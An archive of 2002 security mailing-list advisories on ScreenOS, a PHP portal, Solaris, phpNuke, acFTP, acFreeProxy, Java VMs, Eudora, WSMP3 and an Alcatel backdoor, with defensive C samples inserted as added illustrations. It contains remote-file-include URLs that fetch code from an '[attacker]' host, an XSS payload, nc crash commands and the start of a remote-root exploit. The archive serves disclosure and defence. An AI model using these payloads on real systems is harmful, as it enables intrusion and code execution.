Predictable TCP Initial Sequence Numbers

2002-11-25 Thread NetScreen Security Response Team
Title: NetScreen Security Alert 51897

Date: 25 November 2002

Description: Predictable TCP Initial Sequence Numbers

Impact: Circumvention of Defined Security Policies

Affected Products: All firewall/VPN appliances and systems

Affected Software Releases: ScreenOS 1.7, 2.6, 2.8, 3.0, 3.1, 4.0

Summary:

A vulnerability has been reported and confirmed in the algorithms generating TCP 
initial sequence numbers that makes their selection predictable. This vulnerability is 
present in ScreenOS 4.0.0 and all prior released versions of ScreenOS.

Predictable TCP ISNs and IP spoofing may be used to gain access to TCP applications or 
services that use IP address based authentication. A considerable amount of 
information regarding this topic can be found at 
http://www.cert.org/advisories/CA-2001-09.html

The vulnerability is exploitable on TCP connections to and from the NetScreen device 
itself. The vulnerability is also exploitable on TCP connections that match policies 
requiring authentication, and on connections forwarded through the device between two 
other hosts during syn-flood protection, when the NetScreen device is performing SYN 
proxying for the protected hosts.

This vulnerability is not exploitable on TCP traffic secured via IPSec, SSH, or other 
mechanisms that make interception and modification of traffic detectable.

The algorithms used to select TCP ISNs in affected versions of ScreenOS 2.6 and 
earlier are most predictable, thus the risks associated with this vulnerability are 
higher for devices running these versions of ScreenOS. Different algorithms with 
significantly less predictability were introduced in ScreenOS 3.0. Algorithms based on 
RFC 1948 were introduced in ScreenOS 4.0.1, and are used in the maintenance releases 
indicated below.
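The RFC 1948 structure the paragraph refers to, as an added illustration (not ScreenOS code): ISN = M + F(localhost, localport, remotehost, remoteport, secret), contrasted with a purely clock-driven generator. The hash F here is a keyed FNV-1a stand-in for the MD5 that RFC 1948 specifies, used only to make the structure visible; the tuples, clock values and secret are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One TCP connection as seen by the host choosing the ISN. */
struct tcp_tuple {
    uint32_t local_ip;
    uint32_t remote_ip;
    uint16_t local_port;
    uint16_t remote_port;
};

/* F(localhost, localport, remotehost, remoteport, secret) from RFC 1948.
 * Placeholder: 64-bit FNV-1a over secret || 4-tuple, folded to 32 bits.
 * RFC 1948 specifies MD5 here; a real implementation needs a cryptographic
 * hash, this one only makes the structure visible. */
uint32_t tuple_hash(const struct tcp_tuple *t, const uint8_t *secret, size_t slen)
{
    uint64_t h = 14695981039346656037ULL;
    uint8_t tuple[12];
    memcpy(tuple + 0, &t->local_ip, 4);
    memcpy(tuple + 4, &t->remote_ip, 4);
    memcpy(tuple + 8, &t->local_port, 2);
    memcpy(tuple + 10, &t->remote_port, 2);
    for (size_t i = 0; i < slen; i++) {
        h ^= secret[i];
        h *= 1099511628211ULL;
    }
    for (size_t i = 0; i < sizeof tuple; i++) {
        h ^= tuple[i];
        h *= 1099511628211ULL;
    }
    return (uint32_t)(h ^ (h >> 32));
}

/* The classic RFC 793 generator: one global 250 kHz clock (one tick per
 * 4 microseconds) shared by every connection.  One observed ISN reveals
 * the clock, and with it every other connection's ISN. */
uint32_t isn_global_clock(uint32_t usec_since_boot)
{
    return usec_since_boot / 4;
}

/* RFC 1948: ISN = M + F(...).  M is the same clock; F adds a per-connection
 * offset that only the holder of the secret can compute. */
uint32_t isn_rfc1948(const struct tcp_tuple *t, const uint8_t *secret,
                     size_t slen, uint32_t usec_since_boot)
{
    return isn_global_clock(usec_since_boot) + tuple_hash(t, secret, slen);
}

/* What an observer who saw `observed` would guess for an ISN issued
 * delta_usec later, assuming the generator is purely clock-driven. */
uint32_t predict_next(uint32_t observed, uint32_t delta_usec)
{
    return observed + delta_usec / 4;
}

int main(void)
{
    const uint8_t secret[] = "constructed-per-boot-secret";   /* constructed */
    const size_t slen = sizeof secret - 1;
    struct tcp_tuple observer = { 0x0A000001u, 0x0A000002u, 40000, 23 };
    struct tcp_tuple other    = { 0x0A000001u, 0x0A000003u, 40001, 23 };
    uint32_t t0 = 1000000, delta = 4000;

    /* Global clock: an ISN seen on the observer's own connection predicts
     * the other connection's next ISN exactly. */
    uint32_t seen = isn_global_clock(t0);
    printf("global clock: guess %u, actual %u\n",
           predict_next(seen, delta), isn_global_clock(t0 + delta));

    /* RFC 1948: the guess is off by hash(other) - hash(observer), an
     * amount that depends on the secret. */
    seen = isn_rfc1948(&observer, secret, slen, t0);
    printf("rfc1948:      guess %u, actual %u\n",
           predict_next(seen, delta),
           isn_rfc1948(&other, secret, slen, t0 + delta));
    return 0;
}
```

Note that for one and the same 4-tuple the RFC 1948 ISN still advances with the clock; the scheme hides other connections' ISNs, which is why the advisory still recommends IPSec or SSH where interception must be detectable.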

Recommended Actions:

Any or all of:

(1) Install one of the maintenance releases indicated below.

(2) Upgrade to ScreenOS 4.0.1.

(3) Only permit protocols that make interception and modification detectable (IPSec, 
SSH, SSL, etc.) to traverse the firewall.

(4) Turn off or readjust syn-flood protection related parameters to minimize exposure 
to the vulnerability.

(5) Follow standard good security practices regarding configuration of the NetScreen 
device and communication to and from it that makes interception and modification 
detectable, if not altogether preventable. Examples include using IPSec tunnels or SSH 
to the device for administrative access to the CLI, MD5 authentication to protect BGP 
sessions, strong authentication for access control, and so on.

Release Schedule:

For a complete release schedule, please visit:  

http://www.netscreen.com/support/alerts/Predictable_TCP_Initial_Sequence_Numbers.html

How to Get ScreenOS:

If you have registered your product with NetScreen and have a valid service contract, 
you can simply download the software from:
http://www.netscreen.com/support/updates.html

You will be prompted for your User ID and Password. Enter the whole or part of your 
company name as your User ID and enter your registered NetScreen device serial number 
as the password.

If you have not yet registered your product with NetScreen, you will need to contact 
NetScreen Technical Support for special instructions on how to obtain the fixed 
software. NetScreen Technical Support is available 24 hours a day, 365 days a year. 
Contact information can be located at 
http://www.netscreen.com/support/technical_assistance.html

Please reference this Advisory title as evidence of your entitlement to the fixed 
software version.

NetScreen authorized Value Added Resellers have access to NetScreen software versions 
and may also be a channel through which to obtain the new release.




Web Server Creator - Web Portal 0.1 (PHP)

2002-11-25 Thread Frog Man





Information:

Website: http://webcreator.com02.com
Tested version: 0.1
Problem: Include file

PHP Code/Location:
news/include/customize.php :
--
<?php
// $l comes straight from the request and is included without any
// validation, so a remote or local file can be pulled in.
$langfile = $l;

include $l;
?>
--

index.php :
---
<?php
[...]
// $pg comes from the request; "acceuil" is only the default page name.
if (!$pg) { $pg = "acceuil"; }
[...]
// $pg is used unvalidated as a file name: remote or local file include.
require ("$pg.php");
?>
[...]
---

Exploits:
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php



Solution:

- Delete the buggy lines in news/include/customize.php
- In index.php replace this line:
require ("$pg.php");
by :
---
// Only require the page if the file exists locally; file_exists() returns
// false for remote URLs, but still true for any local path that exists.
if (file_exists($pg.".php")){
require ("$pg.php");
}
---

A patch can be found on http://www.phpsecure.org.


More details:

In French:
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n






ISS Security Brief: Solaris fs.auto Remote Compromise Vulnerability(fwd)

2002-11-25 Thread Dave Ahmad


David Mirza Ahmad
Symantec



ISS X-Force Security Brief
November 25, 2002

Solaris fs.auto Remote Compromise Vulnerability

Synopsis:

ISS X-Force has discovered a vulnerability in the Sun Microsystems
implementation of the "X Window Font Service", or "XFS". The XFS service was
designed as a component of the X Windows systems to establish a common
mechanism to export font data to all computers on an X Windows network. A
buffer overflow vulnerability exists within the XFS service (fs.auto).

Impact:

Remote attackers can exploit the buffer overflow vulnerability to run
arbitrary commands on a target system. Attackers must exploit this
vulnerability in conjunction with another attack to gain "root" access,
because the fs.auto service does not run with superuser privilege. The Solaris
operating system is configured to run the fs.auto service by default. It is
bound to a high TCP port, which is normally blocked on perimeter firewalls.
Networks that are not filtering high TCP ports, and internal networks are
potentially at risk.

Affected Versions:

Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
Sun Microsystems Solaris 2.6 (Sparc/Intel)
Sun Microsystems Solaris 7 (Sparc/Intel)
Sun Microsystems Solaris 8 (Sparc/Intel)
Sun Microsystems Solaris 9 (Sparc)
Sun Microsystems Solaris 9 Update 2 (Intel)

For the complete ISS X-Force Security Alert, please visit:

http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21541


About Internet Security Systems (ISS) Founded in 1994, Internet Security
Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software
and services that protect critical online resources from an ever-
changing spectrum of threats and misuse. Internet Security Systems is
headquartered in Atlanta, GA, with additional operations throughout the
Americas, Asia, Australia, Europe and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email [EMAIL PROTECTED] for
permission.

Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.

X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server, as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force
[EMAIL PROTECTED] of Internet Security Systems, Inc.





Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

2002-11-25 Thread Matthew Murphy
phpNuke Module Vulnerabilities Enable Identity Theft

Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft

Description

phpNuke is a popular, and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database.  Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges.  Gaining such privileges could likely assist
further compromise of the susceptible system.

I. Search Module Vulnerability

The search module of phpNuke applies absolutely no filtering at all when
returning the "Results for x..." page, and as a result is susceptible to
cross-site scripting via a simple query such as:


acFTP Authentication Issue

2002-11-25 Thread Matthew Murphy
acFTP is an open-source FTP daemon for Windows platforms
(http://www.sourceforge.net/projects/acftp) that offers more functionality
than many proprietary servers (including the MS FTP service).  The
authentication code of acFTP contains a flaw -- specifically, the server
treats users as logged in without a valid password.  This results in
misrepresentation of server activity in log files, and possibly privilege
elevation.

For example:

USER private
PASS #

This leads it to reject my password, but I cannot log in with another set
of credentials, and my log activity appears as "private" instead of the
appropriate "-" or "***".




acFreeProxy Cross-Site Scripting Vulnerability/Possible DoS

2002-11-25 Thread Matthew Murphy
Product Information

acFreeProxy (aka "acfp") is an HTTP/1.x proxy for Microsoft Windows
environments.  It offers caching, and several other features, and has a
plug-in format designed for extensibility.  A flaw in the product may allow
attackers to execute content across domains.

Description

The proxy server may generate an error message if given a host that it
cannot reach, or some other exceptional condition.  The error page generated
during this process does not have any input validation, and is vulnerable to
cross-site scripting.  This allows an attacker to inject code as *any site*
the victim can visit, because this problem is in the proxy, and not a
specific site.

Impact

This vulnerability is significantly more dangerous than any site-specific
flaw, as it can be exploited to read content from any domain, instead of the
limited scope of a typical cross-site scripting flaw, where the site that is
flawed is the only site that can be impacted.

Exploit

http://www.hotmail.com:41997/%3CSCRIPT%3Ealert%28document%3EURL%29%3C/SCRIPT%3E/

If a vulnerable proxy is being run, script execution begins.

I've also found bizarre crash behavior within acfp.  When it accesses
www.hotmail.com it crashes for some reason that I have yet to isolate.  I
believe that this may have something to do with empty entities in responses.
Any ideas?




[LSD] Java and JVM security vulnerabilities

2002-11-25 Thread Last Stage of Delirium

We would like to inform you about several security vulnerabilities in Java
Virtual Machine implementations that we have found during our research. These
vulnerabilities affect at least JVMs used in Netscape Communicator and Microsoft
Internet Explorer web browsers. Below you can find their brief descriptions:

[1] - JIT bug
  (it affects Netscape Communicator 4.0-4.8 on Win32/x86 platform)

  Its successful exploitation allows for complete circumvention of the
  Java type safety rules. As a result, applet sandbox restrictions
  can also be escaped and malicious actions can be taken on the computer
  of the victim user.

[2] - Bytecode Verifier vulnerability
 (it affects Microsoft Internet Explorer 4.0-6.0 including VM build 3805)

  Its successful exploitation allows for complete circumvention of the
  Java type safety rules. As a result, applet sandbox restrictions
  can also be escaped and malicious actions can be taken on the computer
  of the victim user.

[3] - Bytecode Verifier vulnerability
  (it affects SUN JDK 1.1-1.4, Netscape Communicator 4.0-4.8 on Win32
  and Unix systems)

  Its successful exploitation allows gaining read and write access to the
  local file system. It also allows bypassing applet sandbox restrictions
  with regard to network access (socket, bind, listen, accept and connect
  calls). On the Win32 platform, this vulnerability can be exploited in such
  a way that complete circumvention of the Java type safety rules can
  be done. As a result, applet sandbox restrictions can also be
  escaped and malicious actions can be taken on the computer of the victim
  user.

  Although this vulnerability also affects JDK 1.x from SUN, we haven't
  found a way to successfully exploit it under Netscape 6.x and
  Appletviewer.

[4] - Bad implementation of system classes
  (it affects Netscape Communicator 4.0-4.8 on Win32 and Unix systems)

  It allows for arbitrary loads of user provided libraries. When combined
  with the previous Bytecode Verifier vulnerability it can be used to
  deploy and execute arbitrary programs on the computer of the victim user.

More details with regard to each of the above vulnerabilities can be found in
our technical paper that can be downloaded from our website:

http://lsd-pl.net/java_security.html

This paper was published for the first time on October 3rd 2002. It was
presented during our talk at Asia Black Hat Briefings conference in Singapore.

Along with the paper, we also plan to release proof of concept codes for all
of the vulnerabilities that are discussed in it. But this will be done in about
1 week's time from now.

On September 2nd we notified JVM vendors (SUN, Microsoft and Netscape) about
the vulnerabilities that we have found. Along with that we provided them with
a pre-release copy of our paper. Up to this time we have not received ANY
response from Microsoft as well as Netscape with regard to the reported issues
(vendors were given 30 days time to prepare patches). Only SUN replied to our
notification and informed us that proper patches would be prepared for these
issues.

We can understand why there was no response from Netscape since the three [1]
[3][4] vulnerabilities affecting the Netscape web browser were submitted to the
Netscape Bug Bounty program, which entitles the finder of a security bug in
Netscape Communicator to 1000 USD. Netscape seems to be another American
company that does not seem to be fulfilling public obligations made through
the company's web pages (http://home.netscape.com/security/bugbounty.html). While
we were waiting for Netscape's response to our vulnerability report, Netscape
changed(!) the Reward Guidelines of the Bug Bounty program so that now only bugs
in Netscape 7.x are rewarded (previously both the latest 6.x and 4.8 versions were
taken into account). Nice move, huh?

Netscape cannot of course beat Argus Systems who after 18 months still has not
paid us the remaining 45000 USD of the prize money won by us during the 5th
Argus Hacking Challenge (please see http://lsd-pl.net/argus.html for more
information on this subject).

Best Regards,
Members of LSD Research Group
http://lsd-pl.net





iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability

2002-11-25 Thread David Endler

iDEFENSE Security Advisory 11.19.02b:
http://www.idefense.com/advisory/11.19.02b.txt
Eudora Script Execution Vulnerability
November 19, 2002

I. BACKGROUND

Qualcomm Inc.'s Eudora is a graphical e-mail client for Windows and
Macintosh. More information about it is available at
http://www.eudora.com .

II. DESCRIPTION

Remote exploitation of a weakness in Eudora could allow for the
potential retrieval of sensitive information from a targeted Eudora
user's computer.

Eudora saves e-mail attachments in a predictable location. 
Exploitation works as such: an attacker sends an e-mail to a Eudora
user that directs him to a specific URL; the e-mail also contains an
HTML-enabled e-mail attachment that contains scripting code. If the
user is socially engineered into clicking on the link, then a frames
page can load the attachment in one of its frames. The attachment can
then retrieve (within the security settings of the local zone) the
content of any local file, and transmit it back to the attacker. The
attack script, in turn, can retrieve the contents of any local file
and transmit it back to the attacker. Since the issue is simple to
exploit, and the issue has still not been addressed, a sample attack
script is not included in this advisory.

III. ANALYSIS

Exploitation could lead to further compromise if the attacker is able
to retrieve sensitive files such as the Windows SAM table. It is also
possible for the attacker to obtain other confidential information. 
A secure implementation would involve using a random string within
the directory structure to prevent this class of attacks (e.g.
Mozilla e-mail client, etc.).

IV. DETECTION

Eudora 5.1.1 and 5.2 are confirmed to be vulnerable; other versions
may be affected as well.

To determine susceptibility, send an e-mail with an attachment to a
test Eudora user. Check if Eudora stores it in the C:\Program
Files\Qualcomm\Eudora\attach\ directory (assuming a default
installation). 

V. WORKAROUND

Change the default location where Eudora stores e-mail attachments.

VI. VENDOR RESPONSE

A Eudora Tech Support Specialist provided the following response
(from head Eudora developer):

"In rare circumstances, certain ill-formatted MIME boundaries can
cause Eudora to crash. It is exceedingly unlikely that this problem
could be exploited to undermine security. The problem will be fixed
in the next release of Eudora."

[iDEFENSE note: The response does not address the security
implications of this advisory. Two attempts were made to change or
clarify Qualcomm's response; all to no avail.]

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1210 to this issue.

VIII. DISCLOSURE TIMELINE

09/12/2002  Issue disclosed to iDEFENSE
10/14/2002  Qualcomm notified ([EMAIL PROTECTED])
10/14/2002  iDEFENSE clients notified
10/15/2002  Autoresponse received
10/31/2002  Second attempt at contact 
11/07/2002  Third attempt at contact
11/08/2002  Vendor response from J. Michael L. ([EMAIL PROTECTED])
11/10/2002  Clarification request of Vendor Response from iDEFENSE
11/11/2002  Same response from J. Michael L. ([EMAIL PROTECTED])
11/12/2002  Second clarification request of Vendor Response from
iDEFENSE
11/19/2002  Still no reply for vendor clarification of response
11/19/2002  Public disclosure

IX. CREDIT

Bennett Haselton ([EMAIL PROTECTED]) discovered this
vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

[EMAIL PROTECTED]
www.idefense.com





Re: Alert: Microsoft Security Bulletin - MS02-066

2002-11-25 Thread Lise
Hi,

In MS02-066 Microsoft claim they've fixed several Cross Domain
Verification problems. Unfortunately, they are not really clear on
which vulnerabilities they fix. 

Does anyone know which vulnerability was meant with this:
- Frames Cross Site Scripting: CVE-CAN-2002-1187

The CVE number is reserved and doesn't provide much info, at this moment
:-/

Any references to BT/NTBT postings would be greatly appreciated.

Kind regards,

Lise



Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3.

2002-11-25 Thread dong-h0un U



INetCop Security Advisory #2002-0x82-006



* Title: Remote Heap malloc/free & multiple Overflow vulnerability in WSMP3.


0x01. Description
=-=-=-=-=-=-=-=-=

WSMP3d is a web server that is also used by the shoutcast server.
It is a daemon with web server functionality that supports listening to mp3.

If you examine 'src/web_server.c', you can see that very many overflows exist.
Among the various kinds, two representative ones are explained here.

main() function:
  __
  1360  int main(int argc, char *argv[],char *envp[])
...
  1363char recvBuffer[BUFSIZE]; // 32768
...
  1526i=recv(sock,recvBuffer,BUFSIZE,0);
...
  1592conn_req=parse_request(recvBuffer); // parse_request();
  --

parse_request() function:
   __
   560  req_descriptor* parse_request(char *req)
...
   563char reqcpy[1024]; // 1024 ??
...
   572strcpy(reqcpy,req); // Overflow of stack base gets up.
   573ritorno->action=get_op(reqcpy); // get_op();
...
   575strcpy(reqcpy,req);
:
:
   --

A stack overflow happens because strcpy() is used (array of 1024 bytes).
Next, let's look at the heap malloc()/free() bug.

get_op() function:
   --
   671  char* get_op(char *buf)
...
   673char* op;
   674int i;
   675if((op=(char *)malloc(10))==NULL)
...
   684while(buf[i]!=' ')
   685  {
   686op[i]=buf[i]; // This part is very dangerous.
   687i++;
   688  }
   689op[i]='\0';
...
   692return op;
   --

It stores without checking for 0x20 (' ') or for the buffer's end.
Note that op is allocated with malloc(10).

Now, this is reached through the following structure (anticipated):


get_op() -return(op)-> parse_request()
parse_request() -return(ritorno)-> conn_req
rem_req_descriptor(conn_req);


rem_req_descriptor() function:
   __
   504  void rem_req_descriptor(req_descriptor *desc)
   505  {
   506free(desc->action);
   507free(desc->what);
   508free(desc->host);
   509free(desc->agent);
   510free(desc->accept);
   511free(desc->lang);
   512free(desc->enc);
   513free(desc->charset);
   514free(desc->keep);
   515free(desc->conn);
   516free(desc->referer);
   517free(desc->pragma);
   518free(desc->contType);
   519free(desc->contLength);
   520free(desc->content);
   521
   522free(desc);
   --

This looks very interesting. So?
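A bounded replacement for the get_op() loop and the parse_request() strcpy() quoted above, as an added example (not WSMP3 code): it keeps the original sizes (malloc(10), reqcpy[1024]) and the "return the method token or NULL" contract, but rejects a request that does not fit instead of writing past the buffer. The names get_op_safe, copy_request_bounded and parse_method are mine; the request lines in main() are constructed to mirror the two tests in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OP_SIZE  10     /* same as the original malloc(10) in get_op()          */
#define REQ_SIZE 1024   /* same as the original reqcpy[1024] in parse_request() */

/* Copy the method token (text before the first space) into a fresh
 * OP_SIZE buffer.  Unlike the original while(buf[i]!=' ') loop this
 * stops at NUL too, so a request line with no space at all (the
 * "x82-x0x-test" case) cannot read past the end of buf, and it refuses
 * tokens longer than OP_SIZE-1, so the bytes after the malloc(10) chunk
 * (the next chunk's header) can never be overwritten. */
char *get_op_safe(const char *buf)
{
    size_t n = 0;
    while (buf[n] != '\0' && buf[n] != ' ')
        n++;
    if (n == 0 || n > OP_SIZE - 1)
        return NULL;                        /* empty or oversized: reject */
    char *op = malloc(OP_SIZE);
    if (op == NULL)
        return NULL;
    memcpy(op, buf, n);
    op[n] = '\0';
    return op;
}

/* Replacement for strcpy(reqcpy, req): refuse anything that does not fit
 * the fixed stack buffer instead of writing past it. */
int copy_request_bounded(char *reqcpy, size_t cap, const char *req)
{
    size_t len = strlen(req);
    if (len >= cap)
        return -1;                          /* would overflow: drop request */
    memcpy(reqcpy, req, len + 1);
    return 0;
}

/* Minimal stand-in for the parse_request() entry path: returns 1 and sets
 * *op_out (caller frees) when the request line is accepted, 0 otherwise. */
int parse_method(const char *req, char **op_out)
{
    char reqcpy[REQ_SIZE];
    *op_out = NULL;
    if (copy_request_bounded(reqcpy, sizeof reqcpy, req) != 0)
        return 0;
    *op_out = get_op_safe(reqcpy);
    return *op_out != NULL;
}

int main(void)
{
    /* Constructed request lines: a normal one, the advisory's heap test
     * (no space), a short line without a space, and "GET " followed by
     * 2000 'x' bytes like the advisory's stack test. */
    char big[2005];
    memset(big, 'x', sizeof big - 1);
    memcpy(big, "GET ", 4);
    big[sizeof big - 1] = '\0';
    const char *samples[] = { "GET /index.html HTTP/1.0", "x82-x0x-test", "GET", big };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char *op;
        int ok = parse_method(samples[i], &op);
        printf("%-10s <- %.20s%s\n", ok ? op : "rejected", samples[i],
               strlen(samples[i]) > 20 ? "..." : "");
        free(op);
    }
    return 0;
}
```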


0x02. Vulnerable Packages
=-=-=-=-=-=-=-=-=-=-=-=-=

Vendor site: http://wsmp3.sourceforge.net/

{I sent mail to the vendor. The newest version may be a corrected one. (anticipated)}

web_server-0.0.6
-web_server-0.0.6.tar.gz
+RedHat Linux 6.x
web_server-0.0.5 (exploitable)
-web_server-0.0.5.tar.gz
web_server-0.0.4
-web_server-0.0.4.tar.gz
web_server-0.0.3
-web_server-0.0.3.tar.gz.gz
wsmp3-0.0.2
-web_server-0.0.2.tar.gz
web_server-v.0.0.1
-web_server.tar.gz

* I did not run the exploit test on other versions, but they may also be weak.


0x03. Exploit
=-=-=-=-=-=-=

It's a simple test.

* Test -

First, run the wsmp3 server.
Then debug it in another shell.

First, the stack overflow test.

#1) Test attacker:

bash$ (echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000

#2) Debugging:

Program received signal SIGSEGV, Segmentation fault.
0x804a533 in parse_request ()
(gdb) where
#0  0x804a533 in parse_request ()
#1  0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)

Next, the heap malloc()/free() overflow test.

#1) Test attacker:

bash$ (echo "x82-x0x-test";cat)|nc 0 8000

#2) Debugging:

Program received signal SIGSEGV, Segmentation fault.
0x4006fea4 in chunk_free (ar_ptr=0x40104040, p=0x805a720) at malloc.c:3036
3036malloc.c: No such file or directory.
(gdb) where
#0  0x4006fea4 in chunk_free (ar_ptr=0x40104040, p=0x805a720) at malloc.c:3036
#1  0x4006fd75 in __libc_free (mem=0x805a728) at malloc.c:2959
#2  0x804a322 in rem_req_descriptor ()
#3  0x804f138 in main ()
#4  0x4002f1eb in __libc_start_main (main=0x804d3b4 , argc=1,
argv=0xbc04, init=0x8048b74 <_init>, fini=0x804f42c <_fini>,
rtld_fini=0x4000a610 <_dl_fini>, stack_end=0xbbfc)
at ../sysdeps/generic/libc-start.c:90
(gdb)

Because of the multiple overflows, exploitation is difficult.
Very angry. :-(

This is the exploit code that proves it.
This code attacks the heap malloc()/free() only.
Through a remote attack, it gets 'root' privileges!


=== 0x82-Remote.wsmp3xpl.c ===

/*
**
** Proof of Concept WSMP3 Remote root exploit
**   by Xpl017Elz
** __
** Testing exploit:
**
** bash$ ./0x82-Remote.wsmp3xpl -h localhost -p 8000
**
**  Proof of Concept WSMP3 Remote root exploit
**by Xpl017Elz
**
**  Try `./0x82-Remote.wsmp3xpl -?' for more information.
**
**  [1] Make fake chunk.
**  [2] Make shellcode.
**  [3] Send explo

CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS (fwd)

2002-11-25 Thread Dave Ahmad


David Mirza Ahmad
Symantec






CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS

   Original release date: November 21, 2002
   Last revised: --
   Source: CERT/CC, Alcatel

   A complete revision history can be found at the end of this file.

Systems Affected

 * Alcatel  OmniSwitch  7700/7800  switches running Alcatel Operating
   System (AOS) version 5.1.1

Overview

   Alcatel has recently discovered a serious vulnerability in AOS version
   5.1.1.   Exploitation   of   this   vulnerability  can  lead  to  full
   administrative control of the device running AOS.

I. Description

   AOS  typically  runs  on  network  infrastructure devices, such as the
   Alcatel OmniSwitch 7000 series switch. According to Alcatel:

 During an NMAP audit of the AOS 5.1.1 code that runs on the Alcatel
 OmniSwitch  7700/7800  LAN  switches,  it  was  determined a telnet
 server  was listening on TCP port number 6778. This was used during
 development to access the Wind River Vx-Works operating system. Due
 to  an  oversight,  this  access  was  not removed prior to product
 release.

   Further   information   about  this  vulnerability  may  be  found  in
   VU#181721. This issue is also being referenced as CAN-2002-1272:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272

II. Impact

   An  attacker  can  gain  full access to any device running AOS version
   5.1.1,  which  can  result  in,  but  is  not limited to, unauthorized
   access,  unauthorized  monitoring,  information  leakage, or denial of
   service.

III. Solution

Upgrade to AOS 5.1.1.R02 or AOS 5.1.1.R03

   Contact Alcatel's customer support for the updated AOS.

Workarounds

   Block access to port 6778/TCP at your network perimeter.

Appendix A. - Vendor Information

   VU#181721  was  written  by  Alcatel.  As  new  vendor  information is
   reported to the CERT/CC, we will update VU#181721 and note the changes
   in our revision history.

Appendix B. - References

1. VU#181721:   Alcatel  OmniSwitch  7700/7800  does  not  require  a
   password for accessing the telnet server -
   http://www.kb.cert.org/vuls/id/181721

2. OmniSwitch_7000_brief -
   http://www.ind.alcatel.com/nextgen/OmniSwitch_7000_brief.pdf

3. CAN-2002-1272 -
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272

   We  thank  Olivier  Paridaens  and Jeff Hayes of Alcatel for reporting
   this issue.

   Author: Ian A. Finlay.

   This document is available from:
   http://www.cert.org/advisories/CA-2002-32.html

CERT/CC Contact Information

   Email: [EMAIL PROTECTED]
  Phone: +1 412-268-7090 (24-hour hotline)
  Fax: +1 412-268-6989
  Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.

   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.

Using encryption

   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key

   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information